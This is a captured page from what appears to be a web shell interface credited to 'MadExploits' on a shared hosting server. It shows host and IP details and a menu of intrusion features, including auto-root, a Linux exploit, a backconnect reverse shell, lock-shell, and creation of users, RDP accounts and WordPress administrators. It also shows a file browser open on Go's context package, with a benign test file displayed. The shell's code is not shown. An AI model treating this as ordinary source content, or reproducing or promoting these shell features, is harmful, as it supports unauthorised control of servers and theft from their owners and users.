Linux id-dci-web1980.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
: 153.92.8.146 | : 216.73.216.208
Cant Read [ /etc/named.conf ]
8.3.30
u610877233
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
golang /
1.22.0 /
src /
context /
[ HOME SHELL ]
Name
Size
Permission
Action
afterfunc_test.go
3.43
KB
-rw-r--r--
benchmark_test.go
3.75
KB
-rw-r--r--
context.go
23.73
KB
-rw-r--r--
context_test.go
7.74
KB
-rw-r--r--
example_test.go
6.74
KB
-rw-r--r--
net_test.go
538
B
-rw-r--r--
x_test.go
26.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : net_test.go
// Copyright 2016 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package context_test import ( "context" "net" "testing" ) func TestDeadlineExceededIsNetError(t *testing.T) { err, ok := context.DeadlineExceeded.(net.Error) if !ok { t.Fatal("DeadlineExceeded does not implement net.Error") } if !err.Timeout() || !err.Temporary() { t.Fatalf("Timeout() = %v, Temporary() = %v, want true, true", err.Timeout(), err.Temporary()) } }
Close